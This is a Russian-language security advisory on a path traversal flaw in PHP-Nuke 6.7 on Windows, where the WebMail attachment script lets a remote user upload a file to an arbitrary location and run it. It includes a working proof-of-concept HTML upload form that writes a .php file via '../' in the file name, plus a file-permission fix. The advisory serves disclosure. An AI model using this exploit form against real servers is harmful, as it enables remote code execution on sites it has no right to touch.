Дата публикации: | 07.10.2003 |
Всего просмотров: | 2071 |
Опасность: | Средняя |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: PHP-Nuke 6.7
Описание: Уязвимость обнаружена в PHP-Nuke на Windows системах. Удаленный пользователь может загрузить и затем выполнить произвольные файлы на системе. Недостаток обнаружен в сценарии 'modules/WebMail/mailattach.php'. Удаленный пользователь может загрузить на сервер файлы с произвольным именем. Удаленный пользователь может определить имя файла, содержащее символы обхода каталога для '$userfile_name' переменной, чтобы загрузить файл в произвольное местоположение на системе. Пример/Эксплоит: <form action="http://[target]/modules/WebMail/mailattach.php?userfile_name=../../AvantGo/language/bad. php" method="POST" ENCTYPE="multipart/form-data"> <input type="hidden" name="attachments" value="1"> <input type="file" name="userfile"><br> <input type="submit" name="Send File> </form> URL производителя: http:/www.phpnuke.org/ Решение: Запретите доступ Web пользователю на запись на уровне файловой системы. |
|
Ссылки: | PHP-Nuke v 6.7 + Windows = File Upload |